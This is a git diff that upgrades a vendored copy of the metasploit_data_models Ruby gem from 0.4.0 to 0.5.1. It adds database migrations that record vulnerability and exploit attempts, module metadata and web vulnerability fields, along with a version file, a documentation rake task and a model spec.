+ add_column :host_details, :nx_risk_score, :float
+
+ add_column :vuln_details, :nx_scan_id, :integer
+ add_column :vuln_details, :nx_vulnerable_since, :timestamp
+ add_column :vuln_details, :nx_pci_compliance_status, :string
+ end
+
+ def self.down
+ remove_column :host_details, :nx_site_name
+ remove_column :host_details, :nx_site_importance
+ remove_column :host_details, :nx_scan_template
+ remove_column :host_details, :nx_risk_score
+
+ remove_column :vuln_details, :nx_scan_id
+ remove_column :vuln_details, :nx_vulnerable_since
+ remove_column :vuln_details, :nx_pci_compliance_status
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb
new file mode 100755
index 0000000000..b943fe358f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000004_add_vuln_attempts.rb
@@ -0,0 +1,19 @@
+class AddVulnAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :vuln_attempts do |t|
+ t.integer :vuln_id # Vuln table reference
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ end
+ end
+
+ def self.down
+ drop_table :vuln_attempts
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
new file mode 100755
index 0000000000..c34101fd89
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
@@ -0,0 +1,14 @@
+class AddVulnAndHostCounterCaches < ActiveRecord::Migration
+
+ def self.up
+ add_column :hosts, :host_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_detail_count, :integer, :default => 0
+ add_column :vulns, :vuln_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ remove_column :hosts, :host_detail_count
+ remove_column :vulns, :vuln_detail_count
+ remove_column :vulns, :vuln_attempt_count
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb
new file mode 100755
index 0000000000..cb99f7ee84
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000006_add_module_details.rb 
@@ -0,0 +1,118 @@
+class AddModuleDetails < ActiveRecord::Migration
+
+ def self.up
+
+ create_table :module_details do |t|
+ t.timestamp :mtime # disk modified time
+ t.text :file # location on disk
+ t.string :mtype # exploit, auxiliary, post, etc
+ t.text :refname # module path (no type)
+ t.text :fullname # module path with type
+ t.text :name # module title
+ t.integer :rank # exploit rank
+ t.text :description #
+ t.string :license # MSF_LICENSE
+ t.boolean :privileged # true or false
+ t.timestamp :disclosure_date # Mar 10 2004
+ t.integer :default_target # 0
+ t.text :default_action # "scan"
+ t.string :stance # "passive"
+ t.boolean :ready # true/false
+ end
+
+ add_index :module_details, :refname
+ add_index :module_details, :name
+ add_index :module_details, :description
+ add_index :module_details, :mtype
+
+ create_table :module_authors do |t|
+ t.integer :module_detail_id
+ t.text :name
+ t.text :email
+ end
+ add_index :module_authors, :module_detail_id
+
+ create_table :module_mixins do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_mixins, :module_detail_id
+
+ create_table :module_targets do |t|
+ t.integer :module_detail_id
+ t.integer :index
+ t.text :name
+ end
+ add_index :module_targets, :module_detail_id
+
+ create_table :module_actions do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_actions, :module_detail_id
+
+ create_table :module_refs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_refs, :module_detail_id
+ add_index :module_refs, :name
+
+ create_table :module_archs do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_archs, :module_detail_id
+
+ create_table :module_platforms do |t|
+ t.integer :module_detail_id
+ t.text :name
+ end
+ add_index :module_platforms, :module_detail_id
+
+ end
+
+ def self.down
+ remove_index :module_details, :refname
+ remove_index :module_details, :name
+ remove_index :module_details, :description
+ remove_index :module_details, :mtype
+
+ remove_index :module_authors, :module_detail_id
+ remove_index :module_mixins, :module_detail_id
+ remove_index :module_targets, :module_detail_id
+ remove_index :module_actions, :module_detail_id
+ remove_index :module_refs, :module_detail_id
+ remove_index :module_refs, :name
+ remove_index :module_archs, :module_detail_id
+ remove_index :module_platform, :module_detail_id
+
+ drop_table :module_details
+ drop_table :module_authors
+ drop_table :module_mixins
+ drop_table :module_targets
+ drop_table :module_actions
+ drop_table :module_refs
+ drop_table :module_archs
+ drop_table :module_platforms
+
+ end
+end
+
+=begin
+
+Mdm::Host.find_by_sql("
+SELECT
+ hosts.id, hosts.address, module_details.mtype AS mtype, module_details.refname AS mname, vulns.name AS vname, refs.name AS vref
+FROM
+ hosts,vulns,vulns_refs,refs,module_refs,module_details
+WHERE
+ hosts.id = vulns.host_id AND
+ vulns.id = vulns_refs.vuln_id AND
+ vulns_refs.ref_id = refs.id AND
+ refs.name = module_refs.name AND
+ module_refs.module_detail_id = modules_details.id
+").map{|x| [x.address, x.mname, x.vname, x.vref ] }
+
+
+=end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb
new file mode 100755
index 0000000000..22d3ec0b1f
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000007_add_exploit_attempts.rb
@@ -0,0 +1,26 @@
+class AddExploitAttempts < ActiveRecord::Migration
+
+ def self.up
+ create_table :exploit_attempts do |t|
+ t.integer :host_id # Host table reference (primary)
+ t.integer :service_id # Service table reference (optional)
+ t.integer :vuln_id # Vuln table reference (optional)
+ t.timestamp :attempted_at # Timestamp of when the session was opened or the module exited
+ t.boolean :exploited # Whether or not the attempt succeeded
+ t.string :fail_reason # Short string corresponding to a Msf::Exploit::Failure constant
+ t.string :username # The user that tested this vulnerability
+ t.text :module # The specific module name that was used
+ t.integer :session_id # Database identifier of any opened session
+ t.integer :loot_id # Database identifier of any 'proof' loot (for non-session exploits)
+ t.integer :port # Port -> Services are created/destroyed frequently and failed
+ t.string :proto # Protocol | attempts may be against closed ports.
+ end
+
+ add_column :hosts, :exploit_attempt_count, :integer, :default => 0
+ end
+
+ def self.down
+ drop_table :exploit_attempts
+ remove_column :hosts, :exploit_attempt_count
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb
new file mode 100755
index 0000000000..7d6dd0f96b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120625000008_add_fail_message.rb
@@ -0,0 +1,12 @@
+class AddFailMessage < ActiveRecord::Migration
+
+ def self.up
+ add_column :vuln_attempts, :fail_detail, :text
+ add_column :exploit_attempts, :fail_detail, :text
+ end
+
+ def self.down
+ remove_column :vuln_attempts, :fail_detail
+ remove_column :exploit_attempts, :fail_detail
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
new file mode 100644
index 0000000000..2160e61de6
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
@@ -0,0 +1,13 @@
+class AddOwnerAndPayloadToWebVulns < ActiveRecord::Migration
+
+ def self.up
+ add_column :web_vulns, :owner, :string
+ add_column :web_vulns, :payload, :text
+ end
+
+ def self.down
+ remove_column :web_vulns, :owner
+ remove_column :web_vulns, :payload
+ end
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
new file mode 100644
index 0000000000..bf0f9d7297
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
@@ -0,0 +1,35 @@
+# Changes all the {COLUMNS} in the web_vulns table that are required for {Mdm::WebVuln}, but were previously
+# :null => true
+class ChangeRequiredColumnsToNullFalseInWebVulns < ActiveRecord::Migration
+ # Columns that were previously :null => true, but are actually required to be non-null, so should be
+ # :null => false
+ COLUMNS = [
+ :category,
+ :confidence,
+ :method,
+ :name,
+ :params,
+ :path,
+ :pname,
+ :proof,
+ :risk
+ ]
+ # Table in which {COLUMNS} are.
+ TABLE_NAME = :web_vulns
+
+ # Marks all the {COLUMNS} as :null => true
+ def down
+ COLUMNS.each do |column|
+ change_column_null(TABLE_NAME, column, true)
+ end
+ end
+
+ # Marks all the {COLUMNS} as :null => false
+ def up
+ COLUMNS.each do |column|
+ change_column_null(TABLE_NAME, column, false)
+ end
+ end
+
+
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/mdm/host/operating_system_normalization.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/mdm/host/operating_system_normalization.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/base64_serializer.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/base64_serializer.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/engine.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/engine.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/serialized_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/ip_format_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/ip_format_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/validators/password_is_strong_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb
new file mode 100755
index 0000000000..ee7b61398b
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/metasploit_data_models/version.rb
@@ -0,0 +1,8 @@
+module MetasploitDataModels
+ # MetasploitDataModels follows the {http://semver.org/ Semantic Versioning Specification}. At this time, the API
+ # is considered unstable because although the database migrations have moved from
+ # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the
+ # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework
+ # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0
+ VERSION = '0.5.1'
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake
new file mode 100644
index 0000000000..cc279684e7
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/lib/tasks/yard.rake
@@ -0,0 +1,27 @@
+# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both
+# the below rake tasks and when invoking `yard` from the command line
+
+require 'yard'
+require 'yard/rake/yardoc_task'
+
+namespace :yard do
+ YARD::Rake::YardocTask.new(:doc) do |t|
+ # --no-stats here as 'stats' task called after will print fuller stats
+ t.options = ['--no-stats']
+
+ t.after = Proc.new {
+ Rake::Task['yard:stats'].execute
+ }
+ end
+
+ desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
+ task :stats => :environment do
+ stats = YARD::CLI::Stats.new
+ stats.run('--compact', '--list-undoc')
+ end
+end
+
+# @todo Figure out how to just clone description from yard:doc
+desc "Generate YARD documentation"
+# allow calling namespace to as a task that goes to default task for namespace
+task :yard => ['yard:doc']
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec similarity index 88% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec index ec0d9dd672..c3f3788558 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/metasploit_data_models.gemspec +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/metasploit_data_models.gemspec @@ -18,6 +18,10 @@ Gem::Specification.new do |s| # ---- Dependencies ---- s.add_development_dependency 'rake' + # markdown formatting for yard + s.add_development_dependency 'redcarpet' + # documentation + s.add_development_dependency 'yard' s.add_runtime_dependency 'activerecord', '>= 3.2.10' s.add_runtime_dependency 'activesupport' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb new file mode 100644 index 0000000000..d55706f947 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/app/models/mdm/web_vuln_spec.rb 
@@ -0,0 +1,87 @@
+require 'spec_helper'
+
+describe Mdm::WebVuln do
+ let(:confidence_range) do
+ 1 .. 100
+ end
+
+ let(:methods) do
+ [
+ 'GET',
+ 'POST',
+ # XXX not sure why PATH is valid since it's not an HTTP method verb.
+ 'PATH'
+ ]
+ end
+
+ let(:risk_range) do
+ 0 .. 5
+ end
+
+ context 'associations' do
+ it { should belong_to(:web_site).class_name('Mdm::WebSite') }
+ end
+
+ context 'CONSTANTS' do
+ it 'should define CONFIDENCE_RANGE' do
+ described_class::CONFIDENCE_RANGE.should == confidence_range
+ end
+
+ it 'should define METHODS in any order' do
+ described_class::METHODS.should =~ methods
+ end
+
+ it 'should define RISK_RANGE' do
+ described_class::RISK_RANGE.should == risk_range
+ end
+ end
+
+ context 'database' do
+ context 'columns' do
+ it { should have_db_column(:blame).of_type(:text) }
+ it { should have_db_column(:category).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:confidence).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:description).of_type(:text) }
+ it { should have_db_column(:method).of_type(:string).with_options(:limit => 1024, :null => false) }
+ it { should have_db_column(:name).of_type(:string).with_options(:limit => 1024, :null => false) }
+ it { should have_db_column(:owner).of_type(:string) }
+ it { should have_db_column(:params).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:path).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:payload).of_type(:text) }
+ it { should have_db_column(:pname).of_type(:text).with_options(:null => false) }
+ it { should have_db_column(:proof).of_type(:binary).with_options(:null => false) }
+ it { should have_db_column(:query).of_type(:text) }
+ it { should have_db_column(:request).of_type(:binary) }
+ it { should have_db_column(:risk).of_type(:integer).with_options(:null => false) }
+ it { should have_db_column(:web_site_id).of_type(:integer).with_options(:null => false) }
+
+ context 'timestamps' do
+ it { should have_db_column(:created_at).of_type(:datetime).with_options(:null => false) }
+ it { should have_db_column(:updated_at).of_type(:datetime).with_options(:null => false) }
+ end
+ end
+
+ context 'indices' do
+ it { should have_db_index(:method) }
+ it { should have_db_index(:name) }
+ it { should have_db_index(:path) }
+ end
+ end
+
+ context 'validations' do
+ it { should validate_presence_of :category }
+ it { should ensure_inclusion_of(:confidence).in_range(confidence_range) }
+ it { should ensure_inclusion_of(:method).in_array(methods) }
+ it { should validate_presence_of :name }
+ it { should validate_presence_of :path }
+ it { should validate_presence_of :params }
+ it { should validate_presence_of :pname }
+ it { should validate_presence_of :proof }
+ it { should ensure_inclusion_of(:risk).in_range(risk_range) }
+ it { should validate_presence_of :web_site }
+ end
+
+ context 'serializations' do
+ it { should serialize(:params).as_instance_of(MetasploitDataModels::Base64Serializer) }
+ end
+end
\ No newline at end of file
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/Rakefile
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/Rakefile
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/javascripts/application.js
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/javascripts/application.js
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/assets/stylesheets/application.css
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/assets/stylesheets/application.css
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/controllers/application_controller.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/controllers/application_controller.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/helpers/application_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/helpers/application_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/mailers/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/mailers/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/models/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/models/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/app/views/layouts/application.html.erb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/app/views/layouts/application.html.erb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config.ru
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config.ru
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/application.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/boot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/database.yml.example
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environment.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/development.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/production.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/environments/test.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/backtrace_silencers.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/inflections.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/mime_types.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.4.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb
similarity index 100%
